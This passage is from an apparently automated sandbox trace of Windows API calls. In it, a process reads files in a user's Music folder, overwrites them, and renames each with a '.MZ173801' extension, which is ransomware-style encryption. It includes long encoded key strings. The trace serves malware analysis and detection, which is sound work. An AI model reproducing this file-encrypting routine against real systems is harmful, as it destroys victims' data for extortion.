Nzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.498] GetCurrentThreadId () returned 0x1358 [0117.498] GetCurrentThreadId () returned 0x1358 [0117.498] GetCurrentThreadId () returned 0x1358 [0117.498] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.498] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.498] GetCurrentThreadId () returned 0x1358 [0117.498] GetCurrentThreadId () returned 0x1358 [0117.498] GetCurrentThreadId () returned 0x1358 [0117.498] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\H0Fbjn1UaDFSWci6YS.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\h0fbjn1uadfswci6ys.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0117.498] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee74*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19ee74*=0) returned 0x0 [0117.498] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0x0 [0117.499] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0xd55e [0117.499] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0x0 [0117.499] ReadFile (in: hFile=0x40c, lpBuffer=0x2439f90, nNumberOfBytesToRead=0xd55e, lpNumberOfBytesRead=0x19ee80, lpOverlapped=0x0 | out: lpBuffer=0x2439f90*, lpNumberOfBytesRead=0x19ee80*=0xd55e, lpOverlapped=0x0) returned 1 [0117.500] CloseHandle (hObject=0x40c) returned 1 [0117.501] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\H0Fbjn1UaDFSWci6YS.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\h0fbjn1uadfswci6ys.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0117.502] WriteFile (in: hFile=0x40c, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xd55e, lpNumberOfBytesWritten=0x19ee8c, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19ee8c*=0xd55e, lpOverlapped=0x0) returned 1 [0117.504] CloseHandle (hObject=0x40c) returned 1 [0117.506] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\H0Fbjn1UaDFSWci6YS.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\h0fbjn1uadfswci6ys.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\H0Fbjn1UaDFSWci6YS.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\h0fbjn1uadfswci6ys.mp3.mz173801")) returned 1 [0117.506] GetCurrentThreadId () returned 0x1358 [0117.506] GetCurrentThreadId () returned 0x1358 [0117.506] GetCurrentThreadId () returned 0x1358 [0117.506] GetCurrentThreadId () returned 0x1358 [0117.506] GetCurrentThreadId () returned 0x1358 [0117.506] GetCurrentThreadId () returned 0x1358 [0117.506] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff6063d0, ftCreationTime.dwHighDateTime=0x1d5ec7a, ftLastAccessTime.dwLowDateTime=0x502dffc0, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0x502dffc0, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x9d3, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="o0b7l4H.m4a", cAlternateFileName="")) returned 1 [0117.506] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef2c | out: lpLocalFileTime=0x19ef2c) returned 1 [0117.507] FileTimeToDosDateTime (in: lpFileTime=0x19ef2c, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.507] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\o0b7l4H.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\o0b7l4h.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19eec0 | out: lpFileInformation=0x19eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff6063d0, ftCreationTime.dwHighDateTime=0x1d5ec7a, ftLastAccessTime.dwLowDateTime=0x502dffc0, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0x502dffc0, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x9d3)) returned 1 [0117.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.507] GetCurrentThreadId () returned 0x1358 [0117.507] GetCurrentThreadId () returned 0x1358 [0117.507] GetCurrentThreadId () returned 0x1358 [0117.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.508] GetCurrentThreadId () returned 0x1358 [0117.508] GetCurrentThreadId () returned 0x1358 [0117.508] GetCurrentThreadId () returned 0x1358 [0117.508] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\o0b7l4H.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\o0b7l4h.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0117.508] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee74*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19ee74*=0) returned 0x0 [0117.508] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0x0 [0117.508] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0x9d3 [0117.508] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0x0 [0117.508] ReadFile (in: hFile=0x40c, lpBuffer=0x2439f90, nNumberOfBytesToRead=0x9d3, lpNumberOfBytesRead=0x19ee80, lpOverlapped=0x0 | out: lpBuffer=0x2439f90*, lpNumberOfBytesRead=0x19ee80*=0x9d3, lpOverlapped=0x0) returned 1 [0117.509] CloseHandle (hObject=0x40c) returned 1 [0117.509] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\o0b7l4H.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\o0b7l4h.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0117.510] WriteFile (in: hFile=0x40c, lpBuffer=0x243bfc0*, nNumberOfBytesToWrite=0x9d3, lpNumberOfBytesWritten=0x19ee8c, lpOverlapped=0x0 | out: lpBuffer=0x243bfc0*, lpNumberOfBytesWritten=0x19ee8c*=0x9d3, lpOverlapped=0x0) returned 1 [0117.511] CloseHandle (hObject=0x40c) returned 1 [0117.512] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\o0b7l4H.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\o0b7l4h.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\o0b7l4H.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\o0b7l4h.m4a.mz173801")) returned 1 [0117.662] GetCurrentThreadId () returned 0x1358 [0117.662] GetCurrentThreadId () returned 0x1358 [0117.662] GetCurrentThreadId () returned 0x1358 [0117.662] GetCurrentThreadId () returned 0x1358 [0117.662] GetCurrentThreadId () returned 0x1358 [0117.662] GetCurrentThreadId () returned 0x1358 [0117.662] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x256e8eb0, ftCreationTime.dwHighDateTime=0x1d5e5ed, ftLastAccessTime.dwLowDateTime=0xc22bc580, ftLastAccessTime.dwHighDateTime=0x1d5ef23, ftLastWriteTime.dwLowDateTime=0xc22bc580, ftLastWriteTime.dwHighDateTime=0x1d5ef23, nFileSizeHigh=0x0, nFileSizeLow=0x8a23, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="W5nBFs1pwVaw l7.wav", cAlternateFileName="W5NBFS~1.WAV")) returned 1 [0117.662] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef2c | out: lpLocalFileTime=0x19ef2c) returned 1 [0117.663] FileTimeToDosDateTime (in: lpFileTime=0x19ef2c, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.663] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\W5nBFs1pwVaw l7.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\w5nbfs1pwvaw l7.wav"), fInfoLevelId=0x0, lpFileInformation=0x19eec0 | out: lpFileInformation=0x19eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x256e8eb0, ftCreationTime.dwHighDateTime=0x1d5e5ed, ftLastAccessTime.dwLowDateTime=0xc22bc580, ftLastAccessTime.dwHighDateTime=0x1d5ef23, ftLastWriteTime.dwLowDateTime=0xc22bc580, ftLastWriteTime.dwHighDateTime=0x1d5ef23, nFileSizeHigh=0x0, nFileSizeLow=0x8a23)) returned 1 [0117.663] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxN